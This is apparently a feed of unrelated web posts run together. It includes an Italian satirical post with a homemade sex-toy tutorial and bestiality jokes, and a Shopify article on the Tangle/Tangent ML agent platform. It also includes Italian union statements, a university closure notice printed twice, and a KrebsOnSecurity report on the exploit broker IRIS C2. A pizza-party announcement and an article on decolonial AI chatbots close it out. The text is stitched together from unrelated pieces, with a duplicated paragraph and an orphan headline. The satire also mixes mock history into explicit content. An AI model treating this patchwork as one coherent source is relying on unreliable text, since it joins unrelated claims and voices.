Quindi cos’è un masturbatore maschile? È difficile dare una risposta a questa domanda che ci ha perseguitato per secoli. Come l’annoso detto che “in tempo di guerra, ogni buco è trincea”, così la forma, le dimensioni e ogni caratteristica fisica di questa entità è variata nel tempo e in base a necessità contingenti che è difficile tracciare, tanto il panorama del desiderio umano è sfaccettato e denso. Posso comunque fornire qualche breve certezza: che la struttura è generalmente costituita da un strumento tubiforme in cui inserire il pene e che in quei bui tempi di violenza e barbarie che sono stati la culla dell’umanità – dal pleistocene alla marcia dei Quarantamila su Torino all’incirca – questa funzione è stata espletata spesso da animali non umani. Galline, pecore e vacche da latte hanno tenuto per sé attraverso i secoli il segreto di questa funzione d’uso secondaria. Oggi fortunatamente, grazie ai progressi strabilianti dell’industria petrolchimica, che ha portato allo sviluppo dei siliconi di grado medico prima e agli elastomeri (TPE) e gomme termoplastiche (TPR) dopo, materiali straordinariamente simili alla superficie degli orifizi tanto desiderati – vulvari, anali od orali che siano – tale tanto brutale esternalizzazione libidica è potuta passare dal soddisfacimento biologico a quello tecnologico. E questo, mi sento di dire in tutta onestà, non può essere che un bene. Non sono mancati certo nella storia isolati gesti messianici di numinosa benevolenza, che hanno tentato di risparmiare l’annoso lavoro di soddisfacimento sessuale alle altre specie, attraverso l’impiego di rozzi surrogati vegetali, tra tutti quello del melone forato, che permetteva di raggiungere con il glande il viscido e zuccherino cuore di semetti al centro del frutto, ma non possiamo che considerarli come casi isolati, black swan events, sparute vette di genuina compassione inghiottite dalla cieca corsa della Storia.
Bene, le tecnologie. Sarà evidente, dopo questa sparuta rassegna storiografica, che si squaderna davanti a noi l’eterno scontro tra produzione capitalistica e DIY, che tanto caratterizza la nostra società contemporanea. Cosa fare dunque? Cedere a una produzione di masturbatori di origine quasi esclusivamente statunitense, che addirittura promettono calchi realistici delle cavità più lussuriose delle pornostar, venduti ovviamente a prezzi proibitivi e che palesano un mondo in cui perfino la soddisfazione degli istinti sessuali si posiziona su una gerarchia basata sulla capacità di spesa; oppure imboccare la strada anacronistica di una decrescita (sessuale) felice, immaginando un mondo in cui ognuno potrà tenere in casa il proprio melone forato, o di più, un durian dalla polpa cremosa, simbolo di un villaggio (sessuale) globale senza più confini o discriminazioni di sorta? È proprio su questo stretto e impervio pendio, su cui sarà chiaro ormai che si gioca l’autodeterminazione orgasmica delle future generazioni, che si fa strada la mia ricerca. Sto quindi lavorando a una soluzione – che qualche malalingua accademica veterocomunista ha già definito di compromesso – ma che a me piace definire di crasi e risignificazione creativa.
Il progetto è questo: rendere disponibile a chiunque ne senta la necessità un progetto di masturbatore autocostruito, prodotto con il riuso creativo di materiali comuni. (Dopo notti insonni passate su subreddit come r/sextoys e r/malesexualhealth, sono arrivata finalmente a un prototipo semidefinitivo che ha ottenuto feedback entusiasti dalla maggiorparte dei miei amici summenzionati.) Ecco un tutorial: sono necessari un tubo di cartone, del tipo che si trova al centro del rotolo della carta asciugatutto o della carta igienica (la scelta tra le due ovviamente va orientata in base alle dimensioni specifiche del soggetto, sotto gli undici centimetri consigliamo il ricorso al secondo), un panno in spugna del tipo che si usa nelle pulizie casalinghe e un guanto in lattice, preferibilmente di qualità medica e ipoallergenico, si preferisca il modello con polvere bianca (generalmente amido di mais) all’interno. Servirà inoltre della colla vinilica, infine del lubrificante a base di acqua per la fruizione finale. Si cosparga di una soluzione in misura di uno a quattro di colla e acqua il tubo di cartone e lo si lasci asciugare una notte, di modo che il giorno successivo risulti ben rigido. Si inserisca nel tubo il panno di spugna incollandolo lungo i bordi interni, ripiegando le parti residue che sporgono verso l’esterno e si attenda di nuovo una notte che la colla faccia presa. Infine si inserisca il guanto in lattice nell’imboccatura del tubo su cui abbiamo ripiegato il bordo di spugna e se ne incolli l’imboccatura verso l’esterno; lasciare ancora riposare per una notte intera affinché la colla si solidifichi. Il giorno successivo avremo costruito un perfetto masturbatore, il cui costo si attesterà su pochi euro, pronto da usare ad ogni evenienza, preoccupandoci ovviamente di lubrificare abbondantemente la superficie interna prima dell’uso. Una volta ottenuta soddisfazione si proceda a pulizia con sapone naturale e lo si riponga ad asciugare con l’interno del guanto rivolto verso l’esterno.
Gli screening test dei soggetti selezionati per la sperimentazione sono stati estremamente incoraggianti e qualcuno di questi ha anche proposto varianti interessanti, come quella di inserire delle piccole perline (anche i ceci essiccati vanno benissimo) all’interno, per ottenere un’interessante variante delle sensazioni generate. Mi propongo di registrare questa mia creazione, quando sarà giunta allo stadio definitivo, con licenza MIT, così che possa configurarsi come il mio personale regalo all’umanità tutta. Il nome provvisorio per ora è TubHotXXX. Devo ammettere con rammarico che un piccola percentuale dei soggetti partecipanti alla sperimentazione preliminare ha sottolineato di preferire comunque il ricorso ai meloni forati, ma si sa che il genere umano non è avvezzo a cambiamenti tanto radicali quando gli si palesano davanti e quasi gratis.
The post Stanca dei masturbatori maschili first appeared on Stanca.

By Alexey Volkov, Bo Li, Ben Chen, Maksym Yezhov, Pete Luferenko, and Volv Grebennikov – Shopify
Machine learning work is full of loops: form a hypothesis, build a pipeline, run it, read the metrics, adjust, repeat. Tangle is already where Shopify’s ML experiments run, giving engineers a shared platform to build and execute pipelines.
Tangent is an autonomous agent that orchestrates ML experimentation workflows on top of Tangle, deciding what to run, running it, and reporting back. Around Tangent we built a Linux-based platform for hosting these agents securely so they can persist, work remotely, and reach the services they need without ever holding a credential. This is done using containerized isolation, a certificate-issuing proxy, and per-instance persistent storage (details below).
Tangle is an open source, platform-agnostic ML experimentation platform with a powerful drag-and-drop visual editor. Users drag components onto a canvas, wire outputs to inputs to form a pipeline graph, and submit it for execution locally or in the cloud. A caching layer skips or reuses previously executed steps, including steps still in flight, so iteration is fast and cheap. All pipeline runs are stored forever (including graphs, components, and logs), making pipelines reproducible even after years have passed.
Because runs and caches are shared, teammates can inspect, copy, and modify each other’s pipelines in seconds, with no cloning a private notebook and hoping the environment matches. Tangle has similarities with other OSS tools like Airflow and Kubeflow Pipelines; its caching model and visual editor are what make fast experimentation loops possible. Any containerized CLI program written in any language can be used as a Tangle component, and those components exchange data as files in any format (CSV, Parquet, JSON, etc.).
Tangle composes components the way shell scripts, makefiles, and *nix pipes do. More information about Tangle is available at tangleml.com and you can immediately try it out.

Tangent is an autonomous ML engineering agent designed to accelerate your Tangle experimentation workflows. It follows the pattern Andrej Karpathy recently popularized as autoresearch. Tangent takes that idea from a single training script on one GPU to full experiment pipelines running on Tangle, with a fleet of specialized subagents, gated checkpoints, and persistent memory. You point it at a scenario, a model, a metric to improve, a dataset, and it iterates: it analyzes results, forms hypotheses, modifies pipelines, submits runs, monitors them, and synthesizes what it learned. How much you delegate is up to you. Tangent works interactively, so you can hand it a single step (build this component, debug this failed run, analyze these metrics), or you can hand off the entire loop with one command and let it run:
tangent auto

Under the hood is an eight-step loop with gated checkpoints. The agent won’t advance until every item on a step’s checklist passes, and it reloads its instructions and context at each gate so it doesn’t drift over a long run. Memory is persistent and plain-text: a MEMORY.md holds the best-known configuration and hard-won lessons; daily session logs capture the play-by-play, and per-run learnings are archived to object storage.
Tangent’s brain is a skill, written in Markdown. The entry point is a single SKILL.md, backed by a fleet of subagent skills: a researcher, a builder, a debugger, a reviewer, and more. Because skills are just files, they’re portable, reviewable in a pull request, and harness-agnostic, the same skill drives whichever coding agent you prefer.
That portability matters because Tangent runs on open agent harnesses instead of one proprietary client. To add a capability, you write a Markdown file and commit it. There is no binary to build or ship. Markdown was chosen deliberately over a config format or DSL: it’s diffable in a normal PR, requires no schema or parser to validate, and both humans and the coding agent read it natively. The skill file doubles as its own documentation.
# Tangent
A skill is just Markdown. This file is the entry point; each subagent is
its own Markdown file, loaded on demand.
## Commands
tangent <subagent> Read agents/<subagent>.md and follow it.
tangent auto Run the autonomous 8-step experiment loop.
## Subagents Agent file
tangent builder agents/builder.md
tangent debugger agents/debugger.md
tangent researcher agents/researcher.md
tangent reviewer agents/reviewer.md
tangent reporter agents/reporter.md
## Auto Mode - the loop
0 Initialize -> 1 Analyze -> 2 Hypothesize -> 3 Submit ->
4 Monitor -> 5 Evaluate -> 6 Synthesize -> 7 Decide -> (loop)
Each step has a gate. The agent won't advance until every item on the
step's checklist passes - and it re-reads its instructions at each
gate so it doesn't drift over a long run.
Our Tangent Agent Hosting Platform helps users deploy persistent Tangent instances that communicate with Tangle, cloud providers, and other external services. Each Tangent instance is a multi-agent space: a Linux-based VM/container that can host multiple agentic apps (TUI, API, WebUI). Because every Tangent component runs as a standard Linux process inside a container, Tangent inherits mature Linux networking, storage, and isolation primitives instead of introducing a custom runtime. Instance data (like agent sessions and memories) is persisted across restarts. There are also cross-instance shared memories.

Agents need access to services, but there is always a risk of agents reading the credentials and leaking them to AI providers. Tangent solves this by adding a system-wide proxy which lives in a separate container. The proxy intercepts and modifies HTTP requests coming from the agentic tools. Auth proxy automatically adds auth headers and can modify request URLs (e.g. redirect api.aicompany.com to some AI proxy). To modify HTTPS requests, auth proxy creates new SSL certificates on the fly. The agent container’s OS and programs are configured to trust those certificates via a generated certificate authority.
In the Kubernetes version, each instance is a StatefulSet: a container Pod running agents, apps, and proxies, backed by a per-instance PersistentVolume and a shared memory volume mount.
To work natively with Tangle, we built a custom Agent Host image. The Tangent Shell is an environment where agents run remotely, keep their memory and sessions across restarts, and keep working long after you close your laptop. Tangent Shell orchestrates multiple agents: it splits a request into slices, delegates them to parallel sub-agents, and coordinates results through a Prime agent that owns the session.
Tangent Shell is built to meet the ML expert’s needs. Each session boots pre-loaded with the Tangent skill toolkit and Tangle API tools, instructed to assist with Tangle-based ML experiments: building and optimizing ML training pipelines, testing hypotheses, ablation studies, hyperparameter optimization, etc. With the help of triggers (like webhooks, timers, and schedules), Tangent Shell is able to monitor pipeline executions and implement deep experimentation plans. The agent knows how to operate inside the rich UI, and how to render visual artifacts (Markdown, PNG, HTML).
The Shell is open source. Agent Bundles (packaged sets of prompts, tools, skills, workflows, and triggers) extend it without touching core code.
We used Tangent to rebuild a large reranking model end to end. An engineer set the direction (which features to try, what training data to add) and reviewed results at each step. Tangent built, ran, and analyzed the experiments. Working through the loop, it tried a sequence of changes and measured each one against the previous best:
| Step | What the agent changed | R@90% prec. | R@95% prec. | R@97% prec. |
|---|---|---|---|---|
| Previous pipeline | Prior distillation training, standard features & data | 67.3% | 54.4% | 33.6% |
| + Standardized pipeline | Migrated onto a reproducible trainer (on par; enables fast iteration) | 69.5% | 51.9% | 35.2% |
| + Richer product features | Added structured metadata, taxonomy, text descriptions, and predicted attributes (biggest single lift) | 71.3% | 58.7% | 48.5% |
| + More & harder training data | Added search-derived, sampled, and hard-negative pairs | 75.6% | 60.2% | 43.9% |
Tangle, the Tangent skills, the Hosting Platform, and Tangent Shell are all released under Apache 2.0. Development happens in the open on GitHub, and the projects accept pull requests for new subagent skills, Agent Bundles, and core fixes. Tangle is maintained by its creator, Alexey Volkov, with Shopify as the project’s initial sponsor and infrastructure steward. If you build a subagent skill or Agent Bundle you think others would find useful, we welcome the PR.
The post Building Autonomous ML Experimentation with Tangle and Tangent appeared first on Linux.com.
La Fondazione PIN - Polo di Prato dell’Università di Firenze sarà chiusa dall'8 al 23 di agosto. Dal 3 al 7 e dal 24 al 28 agosto sarà aperta dalle 8:30 alle 17:30. La Biblioteca resterà chiusa dal 3 al 23 agosto, a partire dal 27 luglio e fino al 29 agosto nei giorni di apertura, sarà aperta dalle 9:00 alle 13:00; in tale periodo i servizi di prestito interbibliotecario e fornitura copie saranno sospesi.
La Fondazione PIN - Polo di Prato dell’Università di Firenze sarà chiusa dall'8 al 23 di agosto. Dal 3 al 7 e dal 24 al 28 agosto sarà aperta dalle 8:30 alle 17:30. La Biblioteca resterà chiusa dal 3 al 23 agosto, a partire dal 27 luglio e fino al 29 agosto nei giorni di apertura, sarà aperta dalle 9:00 alle 13:00; in tale periodo i servizi di prestito interbibliotecario e fornitura copie saranno sospesi.
Con la firma dell'Accordo di Programma da parte di JSW si conclude, a distanza di un anno dalla sottoscrizione dell'Accordo Quadro, un passaggio istituzionale atteso per il futuro del polo siderurgico di Piombino.
Nell'accordo è stata recepita la clausola di salvaguardia occupazionale, così come richiesto da USB e già prevista nell'Accordo di Programma del 2018. Si tratta di un elemento importante, che tutela i lavoratori nella fase di transizione, ma che da solo non è sufficiente a garantire il rilancio del polo.
Nel corso dell'incontro tutte le istituzioni, a partire dal Ministro Adolfo Urso, hanno parlato dell'avvio di una nuova fase per Piombino, sostenendo che il rilancio dello stabilimento possa rappresentare un punto di ripartenza anche per l'intera siderurgia nazionale.
USB ritiene però che sia necessario mantenere grande prudenza. Non diciamo gatto finché non è nel sacco. La storia degli ultimi anni impone di giudicare i risultati sui fatti e non sugli annunci.
JSW, infatti, ha già dimostrato dal 2018 di non aver rispettato gli impegni assunti in materia di investimenti e rilancio produttivo. Allo stesso tempo rimangono forti incognite sul progetto Metinvest, che continua a scontare i ritardi legati al contesto internazionale e alla guerra in Ucraina, con la ricerca ancora aperta di un terzo investitore e un cronoprogramma che sta già accumulando ritardi, anche rispetto agli impegni occupazionali previsti dall'Accordo Quadro.
Per questo sarà determinante l'incontro convocato al Ministero per il prossimo 15 luglio, dedicato all'Accordo di Programma di Metinvest e alla verifica dello stato di attuazione dell'Accordo Quadro sottoscritto lo scorso anno.
Come USB riconosciamo l'importanza della clausola di salvaguardia occupazionale, ma riteniamo che quella di oggi sia anche un'occasione mancata.
A Piombino esistevano tutte le condizioni per un intervento diretto dello Stato. Gli investimenti riguardano aree pubbliche e demaniali e nello stabilimento si produce l'unica rotaia ferroviaria italiana, una produzione strategica per la sicurezza, l'autonomia industriale e lo sviluppo della rete ferroviaria nazionale. Un asset di questo valore non può continuare a essere lasciato nelle mani di gruppi privati che hanno già dimostrato di non mantenere gli impegni assunti.
Dopo anni di finanziamenti pubblici concessi senza risultati concreti, era il momento di cambiare strada. Lo Stato avrebbe dovuto assumere un ruolo diretto nel rilancio del polo siderurgico, garantendo investimenti, occupazione e una vera politica industriale. Continuare a inseguire le promesse delle multinazionali significa esporre ancora una volta lavoratrici, lavoratori e un intero territorio al rischio di nuovi ritardi
e nuove delusioni.
USB continuerà a vigilare affinché gli impegni sottoscritti diventino investimenti reali, occupazione stabile e rilancio produttivo. Per noi la siderurgia è un settore strategico per il Paese e deve tornare sotto un forte controllo pubblico. Solo così sarà possibile garantire il futuro di Piombino e costruire una vera politica industriale nazionale, fondata sull'interesse collettivo e non sulle convenienze dei grandi gruppi privati.
Usb Piombino
Usb Nazionale Industria – Categoria Operia

L'articolo Come scaricare video da YouTube legalmente: metodi consentiti e alternative gratis proviene da FullPress.
Nei giorni scorsi, 6 e 7 luglio, si sono svolti due importanti momenti di confronto presso la sala riunioni dell’Autorità di Sistema Portuale. In entrambi i casi, allo stesso tavolo, i membri delle segreterie sindacali provinciali, i rappresentanti delle aziende e i dirigenti della AdSP.
Abbiamo partecipato alla presentazione ufficiale dei nuovi Rappresentanti dei Lavoratori per la Sicurezza di sito e al tavolo igiene e sicurezza in ambito portuale.
Il tema della sicurezza è un argomento da sempre al primo posto nell’agenda della nostra organizzazione sindacale. Il fatto che USB sia finalmente approdata ai tavoli ufficiali convocati nel porto di Livorno è sicuramente il frutto dell’intenso lavoro svolto in questi anni, che ha portato anche alla elezione di un nostro delegato tra gli
RLS di sito.
Bene il confronto ma su queste tematiche servono interventi strutturali. È necessario agevolare e garantire la massima agibilità e autonomia agli RSL a partire da quelli aziendali. Indispensabile che siano uniformati il più possibile, i protocolli sulla sicurezza esistenti e ne siano prodotti di nuovi aggiornati alle condizioni attuali che, in molti casi, risultano essere diverse dal passato.
Esempio tra tutti il tema del caldo estremo e il rischio connesso di stress termico per i lavoratori. Le procedure operative, il lavoro in stiva, l’utilizzo di mezzi sono altri esempi di fattispecie di rischio elevato che dovranno essere aggiornate. In questo senso anche il lavoro di controllo e di coordinamento dell’Autorità di Sistema Portuale è fondamentale.
Come segreteria USB Mare e Porti rivolgiamo un augurio di buon lavoro ai nuovi RLS di sito e ribadiamo loro, il nostro massimo sostegno
USB Mare e Porti Livorno


Developer Noah Cagle decided the world needed the once obscure but beloved Linux distribution and gave it a decidedly pink refresh.
A cybersecurity startup dangling millions of dollars to acquire zero-day security vulnerabilities in popular software is run by a pair of far-right conspiracy theorists and convicted felons whose most recent ventures included fake intelligence companies and a now-defunct AI-based lobbying platform they operated under assumed names.
The X/Twitter account IRIS C2 (@C2IRIS) has gained more than 4,000 followers since its creation in January 2025, posting frequently about security vulnerabilities, AI and software exploits. IRIS C2 says it is a company in McLean, Va. that sells offensive cybersecurity capabilities.

The IRIS C2 website dangles the possibility of million-dollar payouts for exploits to attract talent.
“Our business model is this,” reads a pinned post on top of the IRIS C2 account on X. “Attract the very best vulnerability researchers and exploit developers in the world to join our company. This mostly revolves around junior engineers with raw talent/extremely high IQ. We don’t care if they have a college degree/industry experience.”
The website linked in that profile — irisc2[.]com — says the company is hiring for a number of open positions, and a recent post on its LinkedIn page enthuses about an overwhelming number of applications from potential employees. The website claims IRIS C2 is in the business of acquiring “zero-day exploits, individual primitives, partial chains, and full capabilities across all major platforms. Payouts range from $10,000 to $7 million depending on target, reliability, and operational value.”
The government contracting portal g2exchange.com reports that irisc2[.]com is operated by a business based in Virginia called Calvexa Group LLC. The “contact” link on the website for Calvexa Group — calvexagroup[.]com — forwards visitors to irisc2[.]com. G2Exchange shows that while Calvexa Group LLC is registered as a federal contractor, it does not appear to be working on any direct government contracts.
A search on the Arlington, Va. address listed in the incorporation records for Calvexa Group LLC finds the property is occupied by Jack Burkman, the 60-year-old founder and managing partner of the lobbying firm Burkman & Associates. When approached with questions about IRIS C2, Burkman referred further inquiries to his longtime associate, 28-year-old Jacob Wohl.

Jack Burkman (left) and Jacob Wohl, at a press conference in August 2020. Image: Wikipedia.
Burkman and Wohl have a storied history of creating fake intelligence companies and using them to spread false claims about and frame public figures, including fabricated sexual assault claims against then FBI director Robert Mueller, and Pete Buttigieg, then mayor of South Bend, Indiana and a Democratic candidate for the presidency. In 2019, Burkman and Wohl held press conferences falsely alleging extramarital affairs by Sen. Elizabeth Warren (D-Mass.) and then-2020 presidential candidate Kamala Harris.
In the wake of the 2020 presidential election, Wohl and Burkman were prosecuted by multiple U.S. states for making thousands of robocalls to residents of battleground states and disseminating false claims about mail-in ballots. They were indicted in Cleveland on 15 felony counts of orchestrating a robocall scheme aimed at suppressing the black vote in Detroit, and were sentenced in late 2025 to probation after their appeals to dismiss the charges were rejected.
In 2022, Wohl and Burkman both pleaded guilty to a single felony charge of telecommunications fraud in Ohio, and sentenced to a fine, probation, and community service. In March 2023, a judge in a New York civil case ruled that Wohl and Burkman had violated federal and state civil rights laws, and the two agreed to pay a $1 million settlement.
In June 2023, the Federal Communications Commission (FCC) imposed a $5.1 million fine against Wohl and Burkman for their robocall campaigns, at the time the largest fine ever sought by the FCC under the Telephone Consumer Protection Act.

Jacob “Jay” Wohl’s GitHub account.
By the age of 17, Wohl had started multiple investment firms, and cultivated the nickname “Wohl of Wall Street” after appearing on Fox News in 2015 to discuss his new hedge funds. In 2017, the Arizona Corporation Commission charged Wohl and his investment funds with 14 counts of securities fraud, and ordered him to pay $35,000 in restitution. In 2019, Wohl pleaded guilty in California to four felony counts of selling unregistered securities and was sentenced to two years of probation.
The market for previously unknown security vulnerabilities has always been populated by a colorful mix of researchers, academics, charlatans, clout-chasers and people actively involved in cybercrime communities. But the market for selling offensive security services to the U.S. government tends to be far more circumspect. Plenty of government contractors recruit vulnerability researchers and pay for the exclusive rights to novel software exploits, yet none of them do so quite as brazenly and openly as IRIS C2.

Recent posts from the Twitter/X account IRISC2 (@c2iris).
Indeed, KrebsOnSecurity was unaware of IRIS C2 until last month, when an attendee at a regional cybersecurity conference shared that Wohl and Calvexa Group were pestering people at the conference about selling their vulnerability research.
In an interview with KrebsOnSecurity, Wohl said Mr. Burkman was not involved in the day-to-day operations of IRIS C2. Wohl shared that IRIS C2 originally began as a penetration testing company, but shifted its focus recently to selling phone-hacking services to the government. Several times throughout the interview, Mr. Wohl mentioned working on federal government contracts, but when pressed for specifics said he was not at liberty to speak publicly about them.
Mr. Wohl said he does not have any formal education or training in computer science or information security, and that most of his knowledge on the matter is self-taught.
“I know more about tech than anyone,” Wohl bragged. “My background has always been extremely technical, and I’ve always been deeply into tech. People know me as someone who is able to create spectacularly exquisite capabilities that would make your head spin.”
Wohl said security researchers bring the company unique vulnerability findings “on a regular basis,” but that in many cases those findings are preliminary and not fully fleshed-out.
“Let’s say someone finds a flaw in a media decoder on a phone,” Wohl said. “A lot of times what we receive is an exploit primitive, where the idea is there but the [execution] needs work. You need that exploit to be stable and reliable, and that’s what we do.”
Wohl claims IRIS C2 has approximately 40 employees, although he said none of them are allowed to list their employment on LinkedIn for operational security reasons. In May, the author of the IRIS C2 account on X said that his girlfriend had no idea what he did for a living. But if IRIS C2 has any other employees, they may be similarly unaware of Mr. Wohl’s history of outright fabrications — or even his real name.
In September 2024, Politico reported that Burkman and Wohl were bragging about big companies supposedly buying services from their now-defunct company LobbyMatic, which claimed to use artificial intelligence to assist in political lobbying efforts. However, Politico found the pair were running the company using pseudonyms, with Wohl reportedly adopting the name “Jay Klein” and Burkman using the moniker “Bill Sanders.” Politico reported that two of the former LobbyMatic employees resigned after learning of their true identities, while other employees only learned after they had left the company.
Update, July 9, 9:44 a.m. ET: Several readers pointed our attention to a March 31 publication from journalist Molly White, which reported that Burkman and Wohl were paid a $300,000 retainer by a Canadian cryptocurrency fraudster wanted by the United States and several other countries for allegedly stealing $65 million from the crypto platforms KyberSwap and Indexed Finance. According to that report, the two were hired to pursue a “presidential pardon to avert a miscarriage of justice” on behalf of the accused hacker, who has not yet been convicted.

Il tempo vola quando ci si diverte e si mangia bene :
Sleppa spegne le sue prime 3 candeline e per festeggiare questo traguardo speciale non potevamo scegliere partner migliori. Siamo orgogliosi di annunciare una collaborazione d’eccezione con la Milano Pizza Week e la prestigiosa guida 50TopPizza.
Il 15 luglio, il locale si trasforma per una serata dedicata interamente alla condivisione, alla buona musica e, ovviamente, alla regina della serata: la pizza.

La Formula della Serata
Si stravolgeranno le regole le regole per una notte: la sera del 15 luglio, il locale non effettuerà il consueto servizio a cena. Vogliamo che lo spazio sia totalmente libero per festeggiare insieme a voi, senza barriere, in un’atmosfera informale e dinamica.

Cosa vi aspetta?
Pizza a portafoglio in OMAGGIO per tutti gli ospiti.
Prosecco per brindare insieme al nostro compleanno.
DJ Set esclusivo per accompagnare la serata con il giusto ritmo.

Programma dell’evento
Segnate la data e preparatevi, ecco il timing della festa:
Dalle 19:00: Si aprono le danze! Inizia il flusso di pizze a portafoglio, calici di bollicine e musica.
Ore 22:00: Momento clou della serata con il taglio della torta per celebrare i 3 anni di Sleppa.
Fino alle 22:30: Si continua a brindare e festeggiare insieme.
Sarà un’occasione unica per incontrarsi, scambiare due chiacchiere e celebrare il percorso insieme a voi che avete sostenuto SLEPPA fin dal primo giorno.
Non mancate: il 15 luglio, venite a brindare !!
L'articolo Sleppa compie 3 anni: Birthday Party con Milano Pizza Week e 50TopPizza proviene da InfoMilano.news.
Immagine in evidenza rielaborata con AI
Si può prendere una tecnologia nata e sviluppata nei centri di potere e riadattarla alle necessità di un gruppo marginalizzato? La domanda, potenzialmente, riguarda tutte le innovazioni tecnologiche. Il caso dell’intelligenza artificiale generativa è però oggi particolarmente discusso assieme alle molteplici problematiche etiche che i grandi modelli linguistici, come anche le tecnologie text-to-image o text-to-video, sollevano: dal rischio di disinformazione, all’impatto ambientale, fino agli utilizzi di questi strumenti a scopi bellici.
Alla radice c’è la questione del controllo, economico e politico, delle infrastrutture tecnologiche, che resta saldamente nelle mani delle grandi aziende, in gran parte statunitensi. Fuori dal mondo occidentale stanno però nascendo iniziative che mirano a riappropriarsi dei sistemi di generative AI per perseguire l’interesse pubblico o a scopi di giustizia sociale. Queste realtà stanno riorganizzando i dataset per l’addestramento degli algoritmi, modificando alcune delle loro caratteristiche tecniche e riorientando gli usi finali degli strumenti. Arrivando in alcuni casi a immaginare infrastrutture pubbliche gestite localmente.
L’AI generativa commerciale – per intenderci, quella di chatbot come Gemini o ChatGPT – si presenta come un archivio di conoscenza universale e neutrale. Ma le cose non stanno così: i dati impiegati per addestrare questi sistemi provengono da Internet e sono tutt’altro che neutrali. I dati di qualità disponibili sono in gran parte in inglese o in altre lingue europee, escludendo inevitabilmente la conoscenza, e quindi la rappresentazione, di una larga parte del mondo.
In un saggio intitolato Decolonizing LLMs: An Ethnographic Framework for AI in African Contexts, gli autori (tra cui figurano, peraltro, anche esponenti di Google) spiegano: “La lingua è intrinsecamente fluida, flessibile e multiculturale. I grandi modelli linguistici (LLM) più diffusi e utilizzati oggi, invece, non lo sono. Sono in gran parte addestrati da team dislocati negli Stati Uniti e istruiti per operare su varianti non specificate di testi in inglese”.
“La diffusione globale degli LLM, un prodotto ‘WEIRD’ (western, educated, industrialised, rich and democratic) rischia quindi di perpetuare i pregiudizi inconsci e i punti ciechi dei suoi creatori”, proseguono gli autori. “Il pericolo è che la loro visione del mondo venga presentata come la visione del mondo a una base di utenti globale, che si aspetta invece risultati neutrali da un programma informatico. Ma che dire del resto della popolazione mondiale, i cui repertori linguistici scritti e parlati non includono l’inglese? E che dire di quegli aspetti della cultura, della lingua e dell’esperienza che non sono ancora stati digitalizzati?”
Di opinione simile è Dima Saber, direttrice esecutiva di Meedan, un’organizzazione non-profit che sviluppa strumenti open source, programmi e ricerche per un’infrastruttura digitale più efficace ed etica. “Internet è fatto per uomini bianchi, della classe media, che parlano inglese. Di conseguenza, gli LLM o i bot vengono addestrati sugli stessi dati presenti in rete, riproducendo così le medesime disuguaglianze”, spiega Saber a Guerre di rete. “Esistono prove del fatto che gli LLM non solo funzionano meno bene nelle lingue diverse dall’inglese, ma anche che le risposte fornite sono piuttosto distorte e riproducono le disuguaglianze già esistenti sul web”.
Proprio per offrire alternative tecnologiche più trasparenti, situate e rispettose delle diversità, Dima Saber e il suo team hanno creato Suwali, un servizio di chatbot pensato per organizzazioni della società civile, redazioni indipendenti e altre realtà di pubblico interesse. L’obiettivo è permettere a queste organizzazioni di archiviare, valorizzare e rendere interrogabili patrimoni di conoscenza spesso sottorappresentati nei modelli mainstream, anche in lingue diverse dall’inglese. Utenti e lettori possono così rivolgere domande al chatbot e ottenere risposte in linguaggio naturale, basate però su un corpus circoscritto e verificabile.
È qui che Suwali si distingue dai servizi commerciali. Il sistema non attinge indistintamente a tutto il materiale disponibile online, ma lavora su una selezione di dati appartenenti alle singole organizzazioni: archivi, report, articoli e altri documenti da loro prodotti o scelti. Suwali è già utilizzato da diverse realtà, soprattutto nel Sud globale. In Libano, la non-profit OMGYNO lo impiega per fornire informazioni affidabili sulla salute riproduttiva delle donne; in India, la redazione di The Quint lo usa per rispondere ai dubbi dei lettori su disinformazione e truffe.
“Un chatbot che utilizza i dati dell’organizzazione e il suo corpus di conoscenze per formulare le risposte permette di aggirare la riproduzione delle stesse disuguaglianze che esistono online”, spiega Saber. “È qualcosa di cui abbiamo assolutamente bisogno. Inoltre, non stiamo cedendo i dati a nessuno, non cerchiamo di venderli agli inserzionisti e le organizzazioni mantengono la proprietà delle informazioni. Questo è un altro aspetto che, per quanto riguarda la sovranità dei dati, per noi è davvero imprescindibile”. I server di Meedan sono ospitati in Irlanda, in modo che la legislazione applicabile sia quella del GDPR europeo, al momento la più avanzata al mondo in termini di tutela dei dati personali.
L’obiettivo centrale è quello di restituire alle organizzazioni, anche quelle con poche risorse, una agency nell’uso di strumenti di intelligenza artificiale, offrendo al contempo elevati standard di trasparenza. Suwali permette infatti, attraverso la dashboard degli amministratori, di analizzare il percorso logico compiuto dal chatbot, risalendo al “ragionamento” effettuato dal modello per capire quali fonti ha utilizzato e che sintesi ha compiuto. Si può insomma guardare dentro la “black box” del pensiero algoritmico.
Meedan non ha costruito un proprio large language model da zero, ma si appoggia a quelli commercialmente disponibili. “Facciamo uso dei modelli linguistici, tra cui quello di OpenAI, esclusivamente per la formulazione finale delle risposte” spiega Haramoun Hamieh, senior partnership manager. “Il corpus di riferimento, il recupero delle informazioni e il processo con cui vengono selezionate le fonti restano invece interamente gestiti dai sistemi di Meedan. L’ottimizzazione dei modelli open-weight è nei nostri piani per il prossimo futuro”.
Un’intelligenza artificiale femminista?
Su una filosofia simile è costruito il chatbot AfroféminasGPT, sviluppato dal collettivo omonimo con l’obiettivo di raccogliere e rendere accessibile il pensiero femminista decoloniale. La postura delle sviluppatrici è molto chiara: usare gli strumenti attualmente disponibili e sfruttarne le potenzialità per raggiungere i propri obiettivi.
“L’IA convenzionale ha come norma implicita la persona bianca e riproduce questo pregiudizio in modo sistematico”, spiega la fondatrice Antoinette Torres Soler. “AfroféminasGPT rompe questa logica. Col tempo abbiamo osservato che il pubblico apprezza molto anche la capacità di basarsi sul lavoro di pensatrici e pensatori afrodiscendenti e afro-femministi. Un elemento particolarmente significativo è che, quando le persone del Sud globale interagiscono con lo strumento, questo assume una prospettiva più vicina alla loro esperienza e restituisce risposte con una precisione e una pertinenza che il mainstream dell’IA non offre”.
“La critica più ricorrente è che lo strumento operi all’interno dell’ecosistema di OpenAI, il che pone limiti reali in termini di sovranità tecnologica. È una critica legittima e me ne assumo la responsabilità” continua Torres Soler. “La posizione da cui lavoro è pragmatica e strategica: bisogna utilizzare gli strumenti disponibili e scalare, progressivamente, verso maggiori livelli di autonomia.”.
